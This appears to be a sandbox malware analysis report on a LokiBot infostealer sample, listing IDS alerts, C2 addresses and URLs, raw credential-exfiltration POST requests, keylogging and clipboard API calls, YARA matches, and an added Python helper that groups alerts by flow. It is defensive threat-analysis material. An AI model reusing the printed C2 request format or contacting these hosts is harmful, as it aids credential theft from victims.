              Source: Network traffic | Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49740 -> 94.156.177.41:80
              Source: Network traffic | Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49744 -> 94.156.177.41:80
              Source: Network traffic | Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49735 -> 94.156.177.41:80
              Source: Network traffic | Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49744 -> 94.156.177.41:80
              Source: Network traffic | Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49748 -> 94.156.177.41:80
              Source: Network traffic | Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49747 -> 94.156.177.41:80
              Source: Network traffic | Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49753 -> 94.156.177.41:80
              Source: Network traffic | Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49754 -> 94.156.177.41:80
              Source: Network traffic | Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49731 -> 94.156.177.41:80
              Source: Network traffic | Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.4:49736
              Source: Network traffic | Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49754 -> 94.156.177.41:80
              Source: Network traffic | Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.4:49764
              Source: Network traffic | Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49748 -> 94.156.177.41:80
              Source: Network traffic | Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49770 -> 94.156.177.41:80
              Source: Network traffic | Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49770 -> 94.156.177.41:80
              Source: Network traffic | Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49782 -> 94.156.177.41:80
              Source: Network traffic | Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.4:49740
              Source: Network traffic | Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.4:49788
              Source: Network traffic | Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.4:49738
              Source: Network traffic | Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.4:49757
              Source: Network traffic | Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49746 -> 94.156.177.41:80
              Source: Network traffic | Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49753 -> 94.156.177.41:80
              Source: Network traffic | Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49746 -> 94.156.177.41:80
              Source: Network traffic | Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49746 -> 94.156.177.41:80
              Source: Network traffic | Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49755 -> 94.156.177.41:80
              Source: Network traffic | Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49755 -> 94.156.177.41:80
              Source: Network traffic | Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.4:49747
              Source: Network traffic | Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49746 -> 94.156.177.41:80
              Source: Network traffic | Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49759 -> 94.156.177.41:80
              Source: Network traffic | Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49746 -> 94.156.177.41:80
              Source: Network traffic | Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49759 -> 94.156.177.41:80
              Source: Network traffic | Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49754 -> 94.156.177.41:80
              Source: Network traffic | Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.4:49755
              Source: Network traffic | Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.4:49732
              Source: Network traffic | Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49731 -> 94.156.177.41:80
              Source: Network traffic | Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.4:49746
              Source: Network traffic | Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49733 -> 94.156.177.41:80
              Source: Network traffic | Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49759 -> 94.156.177.41:80
              Source: Network traffic | Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.4:49753
              Source: Network traffic | Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49754 -> 94.156.177.41:80
              Source: Network traffic | Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49754 -> 94.156.177.41:80
              Source: Network traffic | Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49733 -> 94.156.177.41:80
              Source: Network traffic | Suricata IDS: 2024312 - Severity 1 - ET MALWARE LokiBot Application/Credential Data Exfiltration Detected M1 : 192.168.2.4:49731 -> 94.156.177.41:80
              Source: Network traffic | Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49749 -> 94.156.177.41:80
              Source: Network traffic | Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.4:49748
              Source: Network traffic | Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49782 -> 94.156.177.41:80
              Source: Network traffic | Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49782 -> 94.156.177.41:80
              Source: Network traffic | Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49733 -> 94.156.177.41:80
              Source: Network traffic | Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.4:49754
              Source: Network traffic | Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49776 -> 94.156.177.41:80
              Source: Network traffic | Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49776 -> 94.156.177.41:80
              Source: Network traffic | Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49782 -> 94.156.177.41:80
              Source: Network traffic | Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49782 -> 94.156.177.41:80
              Source: Network traffic | Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.4:49770
              Source: Network traffic | Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49752 -> 94.156.177.41:80
              Source: Network traffic | Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49752 -> 94.156.177.41:80
              Source: Network traffic | Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.4:49735
              Source: Network traffic | Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49752 -> 94.156.177.41:80
              Source: Network traffic | Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49806 -> 94.156.177.41:80
              Source: Network traffic | Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49806 -> 94.156.177.41:80
              Source: Network traffic | Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49776 -> 94.156.177.41:80
              Source: Network traffic | Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49776 -> 94.156.177.41:80
              Source: Network traffic | Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49752 -> 94.156.177.41:80
              Source: Network traffic | Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49752 -> 94.156.177.41:80
              Source: Network traffic | Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.4:49744
              Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49758 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49759 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49763 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49749 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49763 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49749 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49806 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49734 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.4:49733
              Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49758 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49758 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49759 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.4:49782
              Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.4:49752
              Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49776 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49763 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49749 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49749 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49806 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.4:49734
              Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49758 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49758 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49763 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49763 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.4:49776
              Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.4:49758
              Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49806 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.4:49749
              Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.4:49759
              Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.4:49763
              Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49760 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49751 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49760 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49751 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49760 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49751 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49751 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49751 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49760 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49760 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.4:49751
              Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.4:49760
              Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49756 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49756 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49756 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49756 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49756 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.4:49756
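The alert rows above are one row per signature hit, so a single TCP flow is spread over several rows and the server-side Fake 404 alert is listed with the direction reversed. The following Python is an added example, not part of the Joe Sandbox report or of Suricata; it regroups rows of exactly this row format by client port so that each flow shows the full set of signatures that fired on it, and then lists the flows where only one side of the exchange was flagged. The input is constructed by copying eight rows from this report (with the "Source:" prefix dropped), and the analysis host address 192.168.2.4 is taken from those rows.

```python
"""Regroup the Suricata alert rows of a Joe Sandbox report by client-side flow.

Added example, not part of the Joe Sandbox report or of Suricata. The regex
assumes the report's row format exactly as rendered in the report text.
"""
import re
from collections import defaultdict

ROW = re.compile(
    r"Suricata IDS: (?P<sid>\d+) - Severity (?P<sev>\d+) - (?P<msg>.+?) : "
    r"(?P<src>[\d.]+):(?P<sport>\d+) -> (?P<dst>[\d.]+):(?P<dport>\d+)"
)

SANDBOX_HOST = "192.168.2.4"  # the analysis VM's address in this report
FAKE_404_SID = 2025483        # the only server -> client signature in the list

# Constructed input: eight rows copied from the report for three client ports.
SAMPLE_ROWS = """\
Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49756 -> 94.156.177.41:80
Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49756 -> 94.156.177.41:80
Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49756 -> 94.156.177.41:80
Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49756 -> 94.156.177.41:80
Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49756 -> 94.156.177.41:80
Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.4:49756
Suricata IDS: 2024312 - Severity 1 - ET MALWARE LokiBot Application/Credential Data Exfiltration Detected M1 : 192.168.2.4:49731 -> 94.156.177.41:80
Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.4:49748
"""


def parse_rows(text):
    """Yield one dict per alert row; lines that do not match the format are skipped."""
    for line in text.splitlines():
        m = ROW.match(line.strip())
        if m:
            row = m.groupdict()
            for key in ("sid", "sev", "sport", "dport"):
                row[key] = int(row[key])
            yield row


def flows_by_client_port(text, client_ip=SANDBOX_HOST):
    """Map (server_ip, client_port) -> sorted SIDs, merging both directions.

    Request signatures fire on client -> server, the Fake 404 signature on
    server -> client, so the client's ephemeral port is the stable flow key.
    """
    flows = defaultdict(set)
    for alert in parse_rows(text):
        if alert["src"] == client_ip:
            key = (alert["dst"], alert["sport"])
        elif alert["dst"] == client_ip:
            key = (alert["src"], alert["dport"])
        else:
            continue  # a flow that does not involve the analysis host
        flows[key].add(alert["sid"])
    return {key: sorted(sids) for key, sids in flows.items()}


def one_sided_flows(text, client_ip=SANDBOX_HOST):
    """Flows flagged on only one side: a request with no fake 404, or a fake 404
    with no request signature. These are the ones worth opening in the pcap."""
    result = []
    for key, sids in flows_by_client_port(text, client_ip).items():
        has_response = FAKE_404_SID in sids
        has_request = any(sid != FAKE_404_SID for sid in sids)
        if has_response != has_request:
            result.append(key)
    return sorted(result)
```

Run over the full list above, this grouping shows that most of the check-in flows fire the User-Agent, both Checkin and both C2-command signatures plus the Fake 404 reply, while port 49731 carries only the credential-exfiltration alert and ports 49735, 49744, 49748 and 49770 appear in a Fake 404 alert only.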
              Source: C:\Windows\SysWOW64\svchost.exe | Network Connect: 94.156.177.41 80
              Source: Malware configuration extractor | URLs: http://kbfvzoboss.bid/alien/fre.php
              Source: Malware configuration extractor | URLs: http://alphastand.trade/alien/fre.php
              Source: Malware configuration extractor | URLs: http://alphastand.win/alien/fre.php
              Source: Malware configuration extractor | URLs: http://alphastand.top/alien/fre.php
              Source: Malware configuration extractor | URLs:
              Source: Joe Sandbox View | IP Address: 94.156.177.41
              Source: Joe Sandbox View | ASN Name: NET1-ASBG
              Source: global traffic | HTTP traffic detected: 34 POST requests to the same endpoint, identical apart from the body length (2 with Content-Length: 176, 32 with Content-Length: 149):
              POST /davinci/five/fre.php HTTP/1.0
              User-Agent: Mozilla/4.08 (Charon; Inferno)
              Host: 94.156.177.41
              Accept: */*
              Content-Type: application/octet-stream
              Content-Encoding: binary
              Content-Key: 1A8F59C4
              Content-Length: 176 (first two requests) / 149 (remaining 32 requests)
              Connection: close
              Source: unknown | TCP traffic detected without corresponding DNS query: 94.156.177.41 (50 connections; the C2 is addressed by IP literal, so no name resolution precedes them)
              Source: C:\Users\user\Desktop\Order84746.exe | Code function: 0_2_00934EB5 InternetReadFile,InternetQueryDataAvailable,InternetReadFile
              Source: unknown | HTTP traffic detected:
              POST /davinci/five/fre.php HTTP/1.0
              User-Agent: Mozilla/4.08 (Charon; Inferno)
              Host: 94.156.177.41
              Accept: */*
              Content-Type: application/octet-stream
              Content-Encoding: binary
              Content-Key: 1A8F59C4
              Content-Length: 176
              Connection: close
              Source: global traffic | HTTP traffic detected: 29 responses from the C2, every one an HTTP/1.1 404 with identical headers except for Date (values, all Fri, 29 Nov 2024 GMT: 06:37:01, 06:37:03, 06:37:04, 06:37:07, 06:37:10, 06:37:12, 06:37:14, 06:37:16, 06:37:21, 06:37:22, 06:37:24, 06:37:29, 06:37:31, 06:37:33, 06:37:35, 06:37:37, 06:37:38, 06:37:40, 06:37:42, 06:37:44, 06:37:45, 06:37:47, 06:37:49, 06:37:54, 06:37:56, 06:37:58, 06:38:00, 06:38:02, 06:38:03):
              HTTP/1.1 404 Not Found
              Server: nginx/1.26.1
              Date: Fri, 29 Nov 2024 06:37:01 GMT
              Content-Type: text/html; charset=utf-8
              Connection: close
              X-Powered-By: PHP/5.4.16
              Body of the first two responses (06:37:01 and 06:37:03) | Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e | Data Ascii: File not found.
              Body of the remaining 27 responses (06:37:04 onwards) | Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e | Data Ascii: File not found. (the eight leading bytes are non-printable and do not appear in the ASCII rendering)
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 29 Nov 2024 06:38:05 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 29 Nov 2024 06:38:07 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 29 Nov 2024 06:38:12 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 29 Nov 2024 06:38:14 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
              Source: svchost.exe, svchost.exe, 00000001.00000002.2658996553.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.ibsensoftware.com/
              Source: C:\Users\user\Desktop\Order84746.exeCode function: 0_2_00936B0C OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,0_2_00936B0C
              Source: C:\Users\user\Desktop\Order84746.exeCode function: 0_2_00936D07 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,0_2_00936D07
              Source: C:\Users\user\Desktop\Order84746.exeCode function: 0_2_00936B0C OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,0_2_00936B0C
              Source: C:\Users\user\Desktop\Order84746.exeCode function: 0_2_00922B37 GetKeyboardState,GetAsyncKeyState,GetKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,0_2_00922B37
              Source: C:\Users\user\Desktop\Order84746.exeCode function: 0_2_0094F7FF NtdllDialogWndProc_W,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SetCapture,ClientToScreen,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,0_2_0094F7FF

              System Summary

              Source: 0.2.Order84746.exe.38a0000.1.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
              Source: 0.2.Order84746.exe.38a0000.1.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
              Source: 0.2.Order84746.exe.38a0000.1.unpack, type: UNPACKEDPE | Matched rule: Loki Payload Author: kevoreilly
              Source: 0.2.Order84746.exe.38a0000.1.unpack, type: UNPACKEDPE | Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
              Source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
              Source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
              Source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Loki Payload Author: kevoreilly
              Source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
              Source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
              Source: 0.2.Order84746.exe.38a0000.1.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
              Source: 0.2.Order84746.exe.38a0000.1.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
              Source: 0.2.Order84746.exe.38a0000.1.raw.unpack, type: UNPACKEDPE | Matched rule: Loki Payload Author: kevoreilly
